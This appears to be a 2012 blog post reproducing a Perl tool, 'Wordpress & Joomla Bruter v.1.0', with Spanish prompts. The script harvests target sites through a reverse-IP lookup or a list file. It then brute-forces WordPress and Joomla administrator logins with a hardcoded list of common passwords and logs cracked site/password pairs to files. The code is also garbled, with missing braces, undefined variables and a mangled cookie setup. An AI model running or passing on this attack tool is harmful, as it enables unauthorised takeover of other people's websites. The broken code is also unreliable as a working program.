abril 30, 2012

Wordpress & Joomla Bruter v.1.0

#!/usr/bin/perl -X
# Wordpress & Joomla Bruter v.1.0                                                        #
# Coded by B47CHGURU on 16-08-2011  for his brother Kishan Patel!!                       #
# Updated on 17-08-2011                                                                  #
#if any bugs are found ...plz do inform me at interestingpal@gmail.com                   #
#reverse ip tool incorporated wont extract all websites.. use yougetsignal.com           #
#Note: You should first install HTML::LinkExtor module with CPAN shell                   #
#To all script kiddies..... changing the "made by" headers wont make you the coder...!!  #
#Respect the coderz..!!!                                                                 #

if($^O =~ /Win/){



 print ("\n#######################################################\n");

 print ("    Fuerza Bruta\n");
 print ("########################################################\n\n\n");
    use warnings;
    use LWP::UserAgent;
 use HTML::LinkExtor;
    use URI::URL;
    use HTTP::Request;
 use HTTP::Request::Common qw(POST);
    use HTTP::Request::Common qw(GET);
    use HTTP::Cookies;
   $ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
$ua->timeout (20);
            file => 'mycookies.txt',
            autosave => 1
my  $i = 1;
my  $count = 0;
my  $vul = 0;
my  $incount = 0;
$asd = 'wp-submit'; 
$indicator = 'b';
 open (CHECKR, "<$data");

close CHECKR;
foreach $Post(@CHECKED) {
if ($Post=~/Bruter/){
$indicator = 'a';
} else {

open HTML, ">>", "wandjbruter.html" or die $!;
if ($indicator=~/b/){
print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</title> \n  </head>";
print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
print HTML "<br /> \n <center>\n <h1><u>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</u></h1> \n <h2><u>####Scan results####</u></h2> \n ";
} else {
print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</title> \n  </head>";
print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
print HTML "<br /> \n <center>\n ";
my @imgs = ();
  sub reverse {
     my($tag, %attr) = @_;
     return if $tag ne 'a';
     push(@TARGETS, values %attr);
print " Quieres realizar un ReverseIP o cargar sitios desde una lista..?(s/n)>";
my $revlist=<STDIN>;
if($revlist =~ /y/){
print "\n IP/Sitio a aplicar ReverseIP..\? >";
my $website=<STDIN>;
my $linds = 'http://sameip.org/ip/' . $website;
print (" \n ############################################## \n");
$url = $linds;
  $p = HTML::LinkExtor->new(\&reverse);

  $res = $ua->request(HTTP::Request->new(GET => $url),
                      sub {$p->parse($_[0])});

  my $base = $res->base;
  @TARGETS = map { $_ = url($_, $base)->abs; } @TARGETS;
  splice (@TARGETS, 0, 1);
  $asshole =$TARGETS[-1];
  print (" \n $asshole \n\n");
  if($asshole =~/nameserverspy/ | $asshole =~ /dailydomains/ | $asshole =~ /sameip/){
  splice (@TARGETS, -6, 6);
  print join("\n", @TARGETS), "\n";
  print (" \n ############################################## \n\n");
  $linkno=$#TARGETS + 1;
goto loop2;
} else {
  print " Indica el Path de tu lista de sitios. >";
my $list=<STDIN>;
  open (THETARGET, "<$list") || die "[-] No se puede abrir la lista !";
$linkno=$#TARGETS + 1;
 @PASSWORDS = ("qwerty","pass","123456","admin","password","pass123","123123","admin123","123456789","test","passwd","demo","Admin","abc123","test123","123456789");
loop2: foreach $linds(@TARGETS){

@imgs = ();
print ("\n");
print ("\n");
print join("\n", @imgs), "\n";
$incount = 0;

$thelind = $linds;
$thelind = clear($thelind);
$thelind = trim($thelind);
$url = $thelind;

$linkdo=$#imgs + 1;
$redirect = $url . '/wp-admin/';
$wp = $url . '/wp-login.php';
$joom = $url . '/administrator/index.php';
print("\n ------------------------------------------ \n   Bruteando $url   \n ------------------------------------------ \n");

##########################################Wordpress Bruting##################################################
 foreach $pass(@PASSWORDS){
 $dollar = 0;
$res = 0;
 my $req = POST $wp, [log => $admin, pwd => $pass, $asd => 'Log In', redirect_to => $redirect, testcookie => '1' ];
    my $res = $ua->request($req);
    if ($res->is_success) {
 $asshole = $res->status_line;
 $dollar = $res->content;
    } else {
 $asshole = $res->status_line;
print ("\n $asshole \n");
 if ($asshole =~ /302/){

 print ("\n\n\n Sitio Crackeado $url Usuario $admin & password $pass \n\n\n");
 open OUTFILE, ">>", "wandjbruter.txt" or die $!;
  print OUTFILE "$url : $pass \n";
  print HTML "\t\t\n<tr><td><a href=\"$wp\"><font color=\"#66FF66\"><strong>$url</strong></a>  cracked with Username: <font color=\"red\">$admin</font> and Password: <font color=\"red\">$pass</font> </font>\n </br> \n </br> \n";
  close OUTFILE;
  next loop2;
 if ($asshole =~ /404/){
 print("$url No corresponde a Wordpress \n\n");
 next loop2;
if ($dollar =~ /Joomla/){
next loop2;
$dollar = 0;
@imgs = ();

$incount = 0

##########################################Joomla Bruting##################################################
sub joomla{
loop: foreach $rass(@PASSWORDS){

my $red = GET $joom;

    my $ret = $ua->request($red);

    if ($ret->is_success) {
 print("\n $url Pertenece a Joomla..!! \n");
        $asshole =  $ret->content;
  $dogy = $ret->status_line;
    } else {
        $assholed = $ret->status_line;
  next loop2;
 $assholed = $ret->status_line;
 if ($assholed =~ /404/){
 print("$url not a Joomla site \n\n");
 next loop2;
 $asdf = '<input type="hidden" name="task" value="login" />';
 while ($asshole =~ m/$asdf/g){
 $asdf = (pos($asshole) - length($1));
 $asdf = $asdf + 29;
 $ass = substr ($asshole, $asdf, 32);
 my $rreq = POST $joom, [username => $admin, passwd => $rass, lang => 'en-GB', option => 'com_login', task => 'login', $ass => '1' ];

    my $rpiq = $ua->request($rreq);
 if ($rpiq->is_success) {
 $assholed = $rpiq->status_line;
 $assholeer =  $rpiq->content;
 $assholed = $rpiq->status_line;

$assholed = $rpiq->status_line;
if ($assholed =~ /303/ | $assholed =~ /301/){
 print ("\n\n\n Joomla website $url crackeado con usuario $admin & password $rass \n\n\n");
 open OUTFILE, ">>", "wandjbruter.txt" or die $!;
  print OUTFILE "$url : $rass \n";
  print HTML "\t\t\n<tr><td><a href=\"$joom\"><font color=\"#66FF66\"><strong>$url</strong></a>  cracked with Username: <font color=\"red\">$admin</font> and Password: <font color=\"red\">$rass</font> </font> \n </br> \n </br> \n";
  close OUTFILE;
  next loop2;



sub clear{

   $website = shift;

   if($website !~ /^http/){

      $website = 'http://www.' . $website;



   return $website;


sub trim{
  $string = shift;
  $string =~ s/^\s+//;            
  $string =~ s/\s+$//; 
  return $string;         
print ("\n\n Todos los sitios han sido escaneados $linkno websites. Puedes ver los resultados en: 'wandjbruter.html'.\n");
print HTML "\n </center>\n </body> \n </html>";
close HTML;

if($^O =~ /Win/){


